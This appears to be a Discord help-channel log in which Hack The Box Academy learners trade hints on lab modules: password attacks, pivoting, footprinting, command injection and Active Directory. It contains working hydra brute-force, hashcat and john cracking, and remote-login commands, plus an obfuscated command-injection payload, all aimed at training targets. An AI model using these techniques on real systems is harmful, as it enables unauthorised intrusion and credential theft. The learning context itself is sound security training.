verify your account and ask that in #starting-point

how do I verify?

I dont see a starting point channel in my list

youll see starting point after you verify

#welcome

ok thanks

buenas

buenas

They actually teach this in a module. Good way to analyze malware

Just don’t hear about this typically I never did until the module

Do you do command: proxychains nmap restofcommandhere

Quick question, I'm having trouble with the RDP section of the Password attacks module, whenever I run hydra against the target for RDP with the provided resources, the scan takes longer than the box time limit. I know theres a restore file, however the IP always changes when you restart the box. Is this a connection issue, or am I missing something? fyi, this happens in both my host and the provided attack machine

bless previous people going through the password mutations i was able to brute the ssh super quick with it

Always try ftp and hope for pw reuse its 4-6 times faster than ssh and you can do both simultaneously

this part of the module required bruting ssh

Right but often ftp is enabled and able to be cracked and in a couple the pw was the same for ssh as it was ftp

Just a tip do with it what you will 🙂

Please ANyone know why i can't upload shell to nibbles on the academy section after obtaining "admin" + "nibbles" ?

What’s the exact module section and question? @tranquil carbon

the academy section that goes through the nibble box is fairly straightforward on how to do so

if you could provide more information as to what errors you are receiving

Yaaaas we need m0ar data friend @tranquil carbon

because often times the reason why it's not working may be in the error

but with just the "it's not working" error... not sure what to tell you friend

Getting started..

this question yeah?

@fathom pendant Yes, that one exactly

i mean

the module tells you how to bruteforce it with hydra...

you will need to use the provided user/password list

Getting started has like 23 sections

however i "cheated" to get my user list to shorten my time :) (Check C:\Users )

it's the nibbles box portion where they walk you through the box

is what it sounds like

Yes it's pretty straight forward but the problem begins with the privilege escalation of nibbles, gotten access to the dashboard but uploading the shell to the site just doesn't happen it just loads and timeout

There are 5 pages with nibbles I assume initial foothold tho

Or is it privesc

are you in as nibble?

Nibbles - Initial Foothold

Right, thats what I have been doing. I got the other questions, but for some reason when I try using hydra against rdp it never finds the correct user/pass. Ill give it another go though

remember you have MULTIPLE ports you can listen to on your system

As admin with pass nibble

did you upload the image it walked you through to do ;)

like

honestly it literally walks you through how to upload your foothold shell and everything

remember it's asking you to do a reverse shell not a web shell; so when you UPLOAD you'll need to LISTEN for your shell as well

Not really sure where to ask this question on here: can anyone explain why the RID 500 Admin on the DC can copy the system.hive but SYSTEM on the DC can NOT? That seems really off to me.

¯_(ツ)_/¯

good question

@rustic sage yea im scratching my head really hard right now

that sounds more like a google question - could also be that misconfigurations happened

Hmm

take a look at the payload you are delivering in the <?php> script

this is probably one of those cases of you're just blindly following without actually taking notes

because this is by far one of the most hand holdy type labs you'll come across; so I definitely suggest paying attention and regoing over some of the module and taking notes

as they will probably come in handy later

Sure thanks man

Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. I am having a hard time finding the flag after performing multiple scans. I have tried vulnerability scan, but any input turns out as wrong.

what's the module and section?

@silver sigil sent you a dm

you may not need to do --script vuln; as that was just an example if you were scanning for vulnerabilites on it

For the Passwd, Shadow & Opasswd section on PASSWORD ATTACKS, I unshadowed the .bak files. Created a mutated password list from the custom.rule and password.list file from provided Password-Attacks files.

Ran hashcat with -m 1800 against the unshadowed file and mutated password list. That was unable to crack it. May I have a hint/get some help?

Can Anyone teach me on how to manage, change PW and user name on kali Linux pls?

@ripe ingot passwd

Ye

just type that and it will change it for current user

Ok wb user name then?

I just wanna edit it

Or change it prolly

usermod -l login-name old-name

I got some help. I was looking in the right place. Couldn't figure out how to open it

can anyone nudge me on Pivoting Tunneling and Port Forwarding - Skills Assessment? got ||an RDP session on 172.16.5.35 and trying to figure out how to pivot to 172.16.6.25||

Update: the pwnbox helped, downloaded the file quickly (the second time), got the file to my VM via ufile, || cracked it with john|| now just trying to mount and see what goodies are inside. Ty for the help

@fathom pendant Thanks, your hint on users definitely helped speed things along

anybody have a sec for a question? In the Shells and payloads Skills assessment. On the last question

what's your question?

It an eternal blue exploit, the machine hangs after it succesfully overwrites the buffer]

I get fail everytime

Wondering if theres another way to exploit. Im about to upload a shell to the webpage and see if that works instead. The hint says its an eternal blue exploit so idk why its hanging up. others have said the same on forums but never gave the fix

i don't remember using eternalblue, let me check again

I appreciate you

Thank you

ok so i did use eternalblue

And it worked?

yeah it works, what's the output you're getting when you run the exploit?

Let me run it again so i can copy and paste it

Need discord nitro so i gotta break it up

It literally wont let me send it wtf

I dmed it

wouldnt let me put it in the chat without having discord nitreo

nitro*

I feel like i've exhausted every default cred for the mysql part of the password attack module

yea ive discovered what type of dns server is running tho, but i cant seem to find the version number

tomorrow, it begins.

||NLnet Labs NSD||

one cred to rule them all

that really doesn't help :^)

it's one of them

and it is in the default creds cheat sheet

i've tried ALL of them or at least I believe I have unless I'm just missing something from the cheatsheet

figured it out :^)

i wasn't using the list

i was using the "improved" list from the sources

:^)

got a link?

it's in the sources in the github repo

basically: I was dumb

O

ye

yeye

now you see

i have been

skill tissue for your skill issue

anyone can give me a nudge on network enumeration with nmap, bypassing firewall section medium lab?

i need help plz... i posted this in the wrong spot accidentally, so here is the link to it: #web message

It was MD5, just had to add the -g 1000 argument and it worked.

what is the exact issue you are facing; if you believe you have the answer or are doing the right thing; have you tried disconnecting/reconnecting to vpn, resetting target, changing vpn region

i've got it

its so weird

my own vm gives diff results compared to when i use the web browser instance

sometimes that happens

like I said; refresh your vpn by disconnecting and reconnecting

is there any reason its like that?

and then boom you get it there too

sometimes it just do be the way that it is

ic sadge

technology is always reliably unreliable :D

:/

i forgot if i did double check this or not but in my note it's ||ntlm|| hash

Hi, I need help with Pivoting, Tunneling, and Port Forwarding(Web Server Pivoting with Rpivot) . I'm doing everything right but I can't browse to the target server.

Hi, are there any Modules in the Academy that consider container attacks (like Docker)?

Good luck 😉

Hi All , Gm , Kindly assist me on Tier 0 - File Transfers module > their first question -("Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer ") >>> how can we get flag.txt (3 points cubes) >>>> i tried accessing on web (both http & https) -ACCESS FORBIDDEN (error 403) & second question , i fetched out the hash by taking RDP (as per mentioned steps in the question2) > SO JUST NEED A BIT OF ASSISTANCE AS nxt sub section- linux file transfer has the same 1st question ) so is it >>> do i need to do directory busting , SQli (OTHER WAYS TO ENUMERATE like we do in OTHER HTB post nmap scans ) OR IS IT ONLY ASKING WGET METHOD TO GET FLAG AS PER QUESTION STATING >>>so bit confused here >>>assistance needed...thanks

so guys need some help. feel really stupid currently on CPTS/Footprinting/IPMI/Password in clear text q.
I'm able to extract the hash, but when using John I get no match when trying with the rockyou word list.
Am I using the wrong syntax: john --wordlists=<path to rockyou> hash.txt

the hash it self I copied everything after admin: into a txt file

--wordlist and not plural

did that aswell , didn't work

do the txt file need to be in any specific format?

nope

and in the txt file should you keep the username?

admin:XXXX etc

depends if you are using hashcat for example you can specify the username to be included with --username

trying with John

experiment

it will only cost you like 5 seconds to remove the username, so go for it

dont get to work :/

its says its loading it, then just session completed

give it a go with hashcat

@surreal perch why not use wget http://ip address/flag.txt

Hi, you can configure FoxyProxy to do that. For example, since I use Chisel (which you might see in a section further in that Module), it sets port 1080 with Socks5. So I do the following:

got it to work with hashcat. Thanks!

Anyone happen to have a nudge/hint?

is this right

thanks alllottt .....mayb i was focusing on HTB-boxes-like mindset-duin nmaps-portscan(enum stuff and thn googgling theri version exploits & all other ways - dirb,goburs, burp etc...(even for tier 0 -stuff) 😀 BUT I WAS BIT SURPRISED WHY THE HELL IT WILL FREAKY HARD BEING IN TIER 0 ...sometimes i was thinking..this way....NEVER THOUGHT IN BASIC GROUND LEVEL STUFF (HA HA HA) >>> mayb all mixing in tier 0,will may b indeed required in tier1 & tier 2...lol anyways thanks alot , much appreciated >>> got in one shot (flag.txt 100%[===================>] 32 --.-KB/s in 0s)

For the Passwd, Shadow & Opasswd section on PASSWORD ATTACKS, I unshadowed the .bak files. Created a mutated password list from the custom.rule and password.list file from provided Password-Attacks files.

Ran hashcat with -m 1800 against the unshadowed file and mutated password list. That was unable to crack it. May I have a hint/get some help?

@magic valve use rockyou.txt

the reason i as is if it is there is something seriously wrong on my end. Because this would be the 3rd question that has not let me answer if the last week

if the answer is not accepted then it is the wrong answer

I attempted..showed will take estimated 4 hours. Pretty sure I let it run for about 10-minutes. Only able to have box connected via VPN for 90 minutes. Assuming it should be cracked before that time?

not the case before even the staff have said the answers i have given where right soooo. lol i just dont want to waste my time if i do have the right answer but their is something wrong with the page

and everything i look up and research says what i have is the right answer, how else would i atart and http server with npm and start it on port 8080

it is partly correct

lol kk i will kepp looking

yosh lol no npm so annoyin

ugh i've hit the kira wall

wats thats

password attacks module

i was dreading this coming up

Yosh!! gl

Just did this one yesterday. This worked for me in the first 5min I think

any tip to nudge me forward on the Password Attacks; Hunting Linux Creds section because SMB is getting me nowhere as it just keeps throwing me up a fake password :C

firefox?

Before or after kira?

before I'm even logged in

because I can't ssh in; smb throws up nothing

do you have the password?

Yeah I went through everything in there with the hint, only way I could think of to get a foothold was brute forcing the ssh with the first 25k mutated passwords

was it 25k at the end?

no :/

the exercise (question) gives you a password, have you mutated it?

The hint gives you one. I believe all of them can be solved without the hint

doable, however, you are saving quite the time to brute-force it

For this one, from what I used and checking the mutated list, yes I had to use 25k otherwise it would miss the password

Fair enough

Just wanted to clarify the rockyou.txt worked in about 5 minutes to crack correct?

with the hint; i was able to brute the ftp service in a split second :D

hello, I have an mv command question in bash

I'm trying to some command injection. I have a website that calls the mv function like so : mv /bla/bla/bla.txt /some/dir/

and i would like to append a command after that, like so : mv /bla/bla/bla.txt /some/dir/ ; somecommand

except when i try to do that, apparently the mv command picks ;somecommand as the directory it tries to move the file to

So is there a way to do what I'm trying to do but better?

No no, the password.list in the resources, mutated with the custom.rules also from the resources

Interesting. Is it okay if I dm’d you to confirm I am using the correct command?

Yeah all good

But this one I literally just followed the steps in the module

Oh I think I know what the issue is! Which user do you want to crack? And are you filtering for that one?

root. Technically not filtering just root. Will message u with screenshots soon

ok im pretty sure i have the right name here or am i out to lunch

Check if you have any spaces before or after if you copied the name from terminal

lol wow

gtg thanks

must have been a spcae

All I remember in that module is that in "Resources" you got a password list and in the "Mutated password" they show you how to, well, mutate it. And that new "mutated" list works for many of the passwords into the Module if rockyou fails. I don't remember if I needed more dictionaries

can someone sanity check me because apparently now I can't hydra or CME this lab

it's just sitting at 1 max thread

edit

sanity check not needed I'm just tired

Tried that and didn’t help. No worries either way. 🙂

can anybody help with the command injection skill assessment?

oh yeah I JUST did the one you're talking about :)

make sure you ONLY ask hashcat to do the root user and not ALL the users; and the mutated password from their custom rules is indeed in the list :)

Hi I am on the cracking into hack the box path and when I unlocked the last module I pressed it twice so it deducted 20 cubes instead of 10 who do I need to speak to get the rebate for the cubes

Support on the site

Green bubble

If you don't see the chat option select an article, then at bottom of article click sad face

anyone?

Ask your question, someone may be able to answer

well if anyone has any idea why this payload doesn't work I'll take the advice: &&{c'p',${PATH:0:1}flag.txt,${PATH:0:1}var${PATH:0:1}www${PATH:0:1}html${PATH:0:1}files}

I don't get an error, but the command seems to execute into nothing

i've tried just having ls as the command but I don't any output either

ahh okay i think you're trying command injection on a wrong parameter for that module judging by your use of cp

no i know the injection uses mv initially

i tried cat too but it didn't work

but i just figure cp into the directory i can read through the web app would be the most efficient way of seeing the flag

hmm cat is what i used but there's a few different pages to filter through on that assessment for finding the one with correct command injection, dm me if you want

I want to know what’s the entry level certification for cybersecurity

Hello All. I am working on Information Gathering - Web Edition Virtual host section. I am stuck and cannot get any of the answers in the assessment. I am running the following command.

ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://10.129.221.42/ -H "HOST: FUZZ.inlanefreight.com" -fs 10918

I has also added inlanefreight 10.x.x.x to my /etc/hosts and I am not getting any of the answers.

Need to add :FUZZ at end of wordlist I think

Like this...? ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt:FUZZ -u http://10.129.221.42/ -H "HOST: FUZZ.inlanefreight.com" -fs 10918

doesnt seem to be working

Hi all, currently doing footprinting module, easy assessment.

Do you guys bruteforce the password after finding the user, or manage to crack the hash ?

-fs is a switch for filtering out specific response sizes from the output. try running the command without the switch, check your output, and add the switch with the response size to filter

also use the smallest top subdomains wordlist from seclists

Thanks for the reply! That’s what I was doing with the -fs switch. The response size for junk was coming out to be 10918. If I don’t add that switch the amount of payloads become quite overwhelming to search through

how to verify

Am I following the right steps?

1. spawn target from academy, add IP and inlanefreight to my /etc/hosts

2. run fuff command and look for Vhosts

Active Directory - Domain Trust Primer

I found all of the flags, but curious if anyone else had issues running the other commands or if I did something wrong?

yeah that's right. change the URL in your command to the domain

nah actually the domain is inlanefreight.htb and not inlanefreight.com

Omg 😆

Can’t believe I missed that.

Thank you

👍

so guys, in the Footprinting Module\SMTP . Am I missing something here? How are you suppose to know how to you need to use smtp-user-enum to solve the question ? Am I missing something obvious in the content?

play with the timeout timings

yeah, my questions are more on how should you come to the conclusion to use that script. when it hasn't been mentioned at all in the content of the module

ahhh my bad

i realise after doing academy in HTB, they dont spoon fed u so much. somethings u have to search on ur own.

of course u can do it 1 by 1 using telnet like the example, but sometimes u just have to search for automated tools to assist u

its frustrating i know. but thats how htb academy wants us to do i believe

depends actually, some people will rely on the material they have in hand and do assignment, so their brain wouldnt want to look outside the material when doing it.

what module ?

i feel like too many switch on play there

i dont think u need -sA and -n

sorry is this on the footprinting module?

looks like it but i dont know what page he is

i taking a break from hard footprinting

oh lol im just about to start that one. i would try a dns* script

what module is this ?

oh wait. sorry i did do that one. this is on the medium lab right?

i think hes trying to get the bind.version

which is an enum script

BUT which vpn are you using? tcp or udp?

oh

just check i've done this one

but i totally forget how i did it now

HAHAHA

oh well then you dont have to worry about that issue. let me see if i can remember what i did and ill DM you a hint. i know UDP is key

yeah just check my notes

u can bring the -n switch back

@turbid lily Thanks for the help.

ok i was correct. lemme dm you the hit

@acoustic owl can i DM you?

i working on the bash scripting fundamentals and under the conditional execution i don't think i understand the question. i had add in the for loop code that should effectively do this: if $counter eq 35 then echo ${#var} which i think should output the number of characters in the variable var as it wants but the number i get back is not correct.. what did i misunderstand?

hi was anyone able to crack the password for ipmi in footprinting module i am stuck here. i used the command "hashcat --username -m 7300 out.hashcat -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u"

try using a wordlist.

ugh it was off by one because it is expecting me to count the CR of the echo and i counted it internally to the program. bad wording....

what module: Password-attack
which part: Password Attacks Lab - Hard
Question: I have found the hash for an account, I am trying to do a pth or invoke the hash but somehow it wo't let me in. can someone check if I am using the right tool/cmdline?

The pass the hash and pass the ticket sections of the module were added recently and are not used in the final labs.

check

What module is this again? I might be able to assist you. I don't know if I took notes on the assessments but I might be able to give you a push in the right direction.

Yeah it is definitely a mind set thing, it’s interesting journey

the problem was that because of using samr2 to dump i did not get the right output, after using impacket I got the right hash, which worked with a pth attack however only checked after cracking the hash. Thx for nudge though, made me find out my hash was faulty 😄

hi

i'm new here

i want to say

which language do you use ,

?*

We only use English for communication in this server. Check out #welcome and #rules to get verified so that you can get access to all of the channels.

Sure, but I'm on my way right now. Write back later

wdym i am talking english ?

Has anyone finished the HTTPs/TLS Attacks skills assessment? I need some help finding the vulnerability.

anyone that has done Attacking Common Services - Easy. please DM. Im at my end trying to figure out what to do with the username i found. I have looked through discord and the form and it seems like im the only one having such trouble with this part....

@steep loom connect to mssql

got it thank you 🙂 problem was wordlist

@wispy pulsarCan i DM you?

of course!

anyone experiencing connection issues to labs? I can load the pages and then for minutes nothing loads.... this is via the vpn connection

Hello

good evening I would like to learn how to hacker social networks

this is not the place

Oke🤷‍♂️

Oke Thanks

Can we please make sure we keep on topic (HTB modules related).

Kinda hard when someone comes in here every few hours and asks us to hack their exes instagram or something like that

The timezone is rough. Just let us know either via DM or ping and we can handle it from there

Will do

Need some help on module Active Directory Enumeration & Attacks

section - Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

question - Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.

if only there was some way channels could be locked down so someone has to verify their account so that people had to read rules and go through some extra steps to reduce spam and direct people to more appropriate channels

😆 If only it were that easy

Ive tried

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\sapsso

evil-winrm -i 10.129.199.182 -u sapsso

evil-winrm -i 10.129.199.182 -u administrator

have been unsuccessful in logging in with these from the parrot attack box

You cant pass a username when using Enter-PSSession You need to create a credential object

how do you create a credential object?

oh wait I think I remember doing that earlier in the module

checking my notes

Wait, why are you using powershell if your attacking from linux??

Just use psexec @wheat garden

I am currently doing the Brute force Skill assessment - Website.

The question says
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

My command is :
hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-10.txt -f 165.232.98.111 -s 32465 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"

What am I missing, since I feel the only thing i needed to change was the php addres, user/pass and fail string ( from the command I recived inside

The hint says to use the username found in first part, which is user

but I cannot find the password. If anybody can nudge me in a correct direction that would be swell

So, are you getting an error or sth

No just the password is not found, I am just wondering where am I going wrong, since using rockyou.txt would take too long, but I browsed the HTB forums and people said rockyou-10 should be enough

then, asked them hahaha

my suggestion, if you asked: change and use better one

a list with 10 passwords is obviously coming a bit short

hello, happy to see you happy

just trying different methods to login ok ill try psexec

Thank you yep psexec worked also was using the wrong I.P address but got the flag now.